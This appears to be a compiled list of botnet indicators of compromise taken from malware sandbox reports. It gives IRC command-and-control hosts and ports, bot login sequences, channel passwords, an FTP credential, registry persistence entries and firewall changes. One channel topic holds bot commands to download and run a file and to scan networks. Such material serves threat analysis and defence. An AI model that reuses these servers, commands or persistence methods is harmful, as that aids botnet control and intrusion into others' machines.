184.106.215.31

Remote Host        Port Number
184.106.215.31     6667

NICK {XPUSA874460}
JOIN ##spam##
PRIVMSG ##spam## :.::[MSN]::. Enviando Mensaje.
PONG irc.priv8net.com
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA874460} -ix

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Services = “service.exe”
    so that service.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update = ...

66.187.108.124

Remote Host        Port Number
66.187.108.124     81

NICK n[USA|XP|COMPUTERNAME]fgfbdpb
USER n “” “lol” :n
JOIN #biz#
PONG 422

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + WindowsDriverControl = “%AppData%\C-76947-8457-2745\wincdrsvn.exe”
    so that wincdrsvn.exe runs every time Windows starts

File System Modifications
* The following files were created in the system:
  # Filename(s) File...

dalga.co.cc

NICK acelya
USER ferda_54 “Cod” “dalga.co.cc” :Perihan^^^^
USERHOST acelya
JOIN #x birtanem }.
MODE #x
NOTICE acelya :.VERSION mIRC v6.03 Khaled Mardam-Bey.
NOTICE acelya :.version mIRC v6.16 Khaled Mardam-Bey.
NOTICE IRC :.version mIRC v6.16 Khaled Mardam-Bey.
NOTICE Version :.version mIRC v6.16 Khaled Mardam-Bey.
PRIVMSG #x :Sahip , Sana Hizmete Haz.r.m ( v2 )
NICK Cansu4...

173.1.102.35

Remote Host        Port Number
173.1.102.35       81

NICK n[USA|XP|COMPUTERNAME]stnlxlc
USER n “” “lol” :n
JOIN #biz#
PONG 422
JOIN #USA# (null)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + WindowsDriverControl = “%AppData%\C-76947-8457-2745\winmsngrn.exe”
    so that winmsngrn.exe runs every time Windows starts

File System Modifications
* The following files were created in the system: ...

91.211.117.33

Remote Host        Port Number
91.211.117.33      6667

NICK {XPUSA933915}
JOIN ##spam##
PONG irc.priv8net.com
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA933915} -ix

Registry Modifications
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Services = “service.exe”
    so that service.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update = “%Temp%\service.exe”
    so that service.exe runs...

updateserver.net

Remote Host        Port Number
66.187.108.125     81

NICK n[USA|XP|COMPUTERNAME]vdpunpf
USER n “” “lol” :n
JOIN #biz#
PONG 422
JOIN #USA# (null)

Registry Modifications
* The newly created Registry Value is:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + WindowsDriverControl = “%AppData%\C-76947-8457-2745\winmsngrn.exe”
    so that winmsngrn.exe runs every time Windows starts

File System Modifications
* The following files were created in the system: ...

205.234.236.19 (Parabolas big net)

Remote Host / Port Number: 184.73.209.168 80, 204.0.5.41 80, 204.0.5.48 80, 204.0.5.49 80, 204.0.5.51 80, 204.0.5.57 80, 204.0.5.58 80, 204.0.5.59 80, 216.178.38.103 80, 216.178.38.168 80, 205.234.236.19 1234

PASS xxx
NICK NEW-[USA|00|P|36443]
USER XP-9032 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|36443] -ix
JOIN #!nn! test
PONG 22 MOTD

* The data identified by the following URLs was then requested...

SmartEye malware

Remote Host        Port Number
184.154.74.130     20
184.154.74.130     21
64.208.241.65      80

* The data identified by the following URLs was then requested from the remote web server:
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/DataScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/CodeScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/UIScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/ResourceScript.js
  o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/MasterScript.js

USER uploader@demo.ymlook.com passwd !234567*

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile
  o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile...

webpro569.redirectme.net

DNS Lookup
Host Name                    IP Address
webpro569.redirectme.net     46.4.245.19

C&C Server: 46.4.245.19:6667
Server Password:
Username: 0127
Nickname: {N}|DEU|XP|DELL-D3E62F7E26|970986
Channel: #webpro (Password: SRR569)
Channeltopic: :oppp pecie of candy

Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Windows Update Sched” = c:BotCrypted.exe
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Windows Update Sched” = c:BotCrypted.exe
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “Windows Update Sched” = c:BotCrypted.exe
Reads
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework...

174.139.92.250 (Link Bot)

Remote Host        Port Number
174.139.92.250     4466,6764

USER waahud waahud waahud :cuipesjdhissjgkx
NICK d[jLyAxEK]b
MODE d[jLyAxEK]b +xi
JOIN #balengor
USERHOST d[jLyAxEK]b
MODE #balengor +smntu
PONG :binidic.net

Now talking in #balengor
Topic On: [ #balengor ] [ * exe 91.203.146.65 9933 ][ * ipscan s.s.s netapi -s ]
Topic By: [ aessg ]

Other details
* The...